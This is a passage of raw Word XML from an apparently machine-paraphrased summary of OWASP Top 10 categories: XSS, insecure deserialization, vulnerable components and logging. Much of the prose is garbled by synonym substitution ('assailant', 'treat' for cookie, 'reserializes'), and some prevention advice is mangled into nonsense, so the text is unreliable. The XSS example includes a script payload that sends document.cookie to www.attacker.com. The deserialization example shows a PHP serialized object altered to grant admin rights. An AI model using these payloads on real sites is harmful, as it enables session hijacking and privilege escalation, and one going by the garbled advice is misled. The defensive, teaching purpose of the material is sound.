        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>JWT tokens ought to be negated on the server after logout. Engineers and QA staff ought to incorporate utilitarian access control unit and combination tests</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="004019C1">
      <w:r>
        <w:t>Situation</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> #1: </w:t>
      </w:r>
      <w:r>
        <w:t>An</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> application </w:t>
      </w:r>
      <w:r>
        <w:t>that is utilizing</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>untrusted</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> in a SQL call that is accessing </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the information in the </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t>account</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BD47BB">
        <w:t>pstmt.setString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD47BB">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD47BB">
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">("acct")); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD47BB">
        <w:t>ResultSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> results = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD47BB">
        <w:t>pstmt.executeQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">( ); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="004019C1">
      <w:r>
        <w:t>Situation</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve"> #2: S</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">imply </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>forcing the</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> browsers to target URLs. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003175A5">
        <w:t>Administrators</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>privileges</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> are required for </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>accessing</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>administrators</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> page. http://example.com/app/getappInfo http://example.com/app/admin_getappInfo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BD47BB">
        <w:t>If</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> an unauthenticated user can access either page, it’s a flaw. If a non-admin can access the admin page, this is a flaw.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A7: CROSS-SITE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SCRIPTING (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">XSS flaws happen at whatever point an application incorporates untrusted information in another page without appropriate approval or getting away, or updates a current site with client provided information utilizing a program API that can </w:t>
      </w:r>
      <w:r>
        <w:t>make HTML or JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="00C07476">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Mitigation/ Preventions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilizing structures that naturally </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>escaping the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS by outline, for example, the most recent </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve">React JS and </w:t>
      </w:r>
      <w:r>
        <w:t>Ruby on Rails</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Take in the impediments of every structure's XSS insurance and suitably handle the utilization cases which are not secured. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Escaping </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>the unknown</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP ask for information in light of the setting in the </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>Hypertext Markup Language</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> yield </w:t>
      </w:r>
      <w:r>
        <w:t>will</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve"> be resolving the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Reflected and Stored XSS vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Applying setting touchy encoding while changing the prog</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve">ram report on the customer acts </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">against DOM XSS. At the point when this </w:t>
      </w:r>
      <w:r w:rsidR="00C07476">
        <w:t xml:space="preserve">cannot be maintained as a strategic distance, </w:t>
      </w:r>
      <w:r>
        <w:t>comparative setting delicate getting away method</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s can be connected to program APIs as portrayed in the OWASP Cheat Sheet 'DOM </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>basing on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS Avoidance'. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="003175A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Enables the</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> Content Security Policy (CSP) is a resistance inside and out alleviating </w:t>
      </w:r>
      <w:r>
        <w:t>control</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> ag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ainst XSS. It is powerful if none of the </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">vulnerabilities </w:t>
      </w:r>
      <w:r>
        <w:t>existing</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t>hat would permit putting vindictive code through nearby record incorporates (e.g. way traversal overwrites or helpless libraries from allowed content conveyance systems).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Situation 1: The application utilizes untrusted information in the developm</w:t>
      </w:r>
      <w:r>
        <w:t>ent of the accompanying HTML bit without approval or getting away: (String) page += "&lt;input name='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>creditcard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">' type='TEXT' value='" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">"CC") + "'&gt;"; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>The assailant alters the 'CC' parameter in the program to: '&gt;&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">://www.attacker.com/cgi-receptacle/cookie.cgi? </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>foo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>='+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">&lt;/script&gt;'. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>This assault makes the casualty's session ID be sent to the aggressor's site, enabling the assailant to capture the client's current session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A8: INSECURE DESERIALI</w:t>
      </w:r>
      <w:r>
        <w:t>ZATION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Unreliable deserialization frequently prompts remote code execution. Regardless of whether deserialization flaws don’t bring about</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>execution</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> remote code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can be </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>used</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:t>perform</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve"> an assault which includes a </w:t>
      </w:r>
      <w:r>
        <w:t>replay attacks, infusion attacks, and benef</w:t>
      </w:r>
      <w:r>
        <w:t>it escalation attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Preventions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Actualizing uprightness checks, for example, computerized marks on any serialized items to avoid unfriendly question creation or information altering. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Enforcing strict write limitations amid deserialization previously q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uestion creation as the code regularly expects a quantifiable arrangement of classes. Detours to this procedure have been illustrated, so dependence exclusively on this isn't fitting. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="003175A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Removing</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> and running code </w:t>
      </w:r>
      <w:r>
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>reserializes</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> low benefit situations </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">when conceivable. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logging deserialization special cases and disappointments, for example, where the approaching sort isn't the normal kind, or the deserialization tosses special cases. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Restricting or checking approaching and active system network from co</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mpartments or servers that </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>reserialize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitoring deserialization, alarming if a client </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>reserializes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> continually</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="003175A5">
      <w:r>
        <w:t>Situation #1:  Calls of a r</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">eact application </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">an arrangement of Spring Boot </w:t>
      </w:r>
      <w:r>
        <w:t>micro services</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t>. Being practical software engineers, they attem</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">pted to guarantee that their code is unchanging. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003175A5" w:rsidRDefault="003175A5"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">Situation #2: A PHP discussion utilizes PHP protest serialization to spare a "super" treat, containing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> client ID, part, watchword hash, and other state: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>a:4:{i:0;i:132;i:1;s:7:"Mallory"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">;i:2;s:4:"user"; i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">An aggressor changes the serialized question give themselves administrator benefits: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin"; i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A9: COMPONEN</w:t>
      </w:r>
      <w:r>
        <w:t>TS WITH KNOWN VULNERABILITIES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">Examples like libraries, structures, and other programming modules, keep running </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>with indistinguishable benefits</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the application. If the </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve">vulnerability of the component is misused, like the </w:t>
      </w:r>
      <w:r>
        <w:t>attack can encourage genuine information</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve"> misfortune or </w:t>
      </w:r>
      <w:r>
        <w:t>takeover</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve"> of a server. </w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t>API and a</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve">pplications </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">utilizing segments with </w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerabilities may undermine</w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application safeguards and empower different attacks and effects.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Preventions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Remove unused conditions, superfluous highlights, segments, rec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ords, and documentation. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Continuously stock the renditions of both customer side and server-side segments (e.g. systems, libraries) and their conditions utilizing devices like renditions, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DependencyCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, retire.js, and so forth. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Persistently screen </w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t>resources</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t>such as the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE and NVD for </w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the segments. Utilize programming piece investigation devices to robotize the procedure. Buy in to email cautions for security vulnerabilities identified with segments you utilize. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Only acquire segments from </w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sources </w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t xml:space="preserve">that are </w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t xml:space="preserve">official </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">over secure connections. Lean toward marked bundles to lessen the possibility of including an adjusted, pernicious part. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00E41CD8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Monitoring the</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> libraries and segments that are </w:t>
      </w:r>
      <w:r>
        <w:t>not maintained</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> or try not to make</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>patches</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> security </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t>for more seasoned rendition</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t>s. In the case of fixing is unrealistic, consider conveying a virtual fix to screen, identify, or secure against the found issue.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Situation #1: Components ordinarily keep running with similar benefits as the application itself, so imperfections i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">n any segment can bring about genuine effect. Such imperfections can be incidental (e.g. coding blunder) or on the other hand deliberate (e.g. indirect access in segment). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">Some illustration exploitable segment vulnerabilities found are: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>CVE-2017-5638, a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Struts 2 remote code execution defenselessness that empowers execution of subjective code on the server, has been rebuked for critical breaks. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">While </w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t>internet of things is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> every now and again troublesome or difficult to fix, the significance of fixing </w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t>it to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be awesome (e.g. biomedical gadgets).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A10: INSUFFICIENT LOGGING &amp; MONITORING</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">Inadequate logging and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>checking,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> combined with absent or insufficient coordination with episode reaction, enables assailants to additionally assault frameworks, look afte</w:t>
      </w:r>
      <w:r>
        <w:t>r determination, turn to more frameworks, and alter, extricate, or crush information. Most rupture thinks about show time to recognize a break is more than 200 days, ordinarily distinguished by outer gatherings instead of interior procedures or observing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Preventions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Ensure all login, get to control disappointments, and server-side info approval disappointments can be logged with adequate client setting to distinguish suspicious or pernicious records, and held for adequate time to permit deferred legal investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
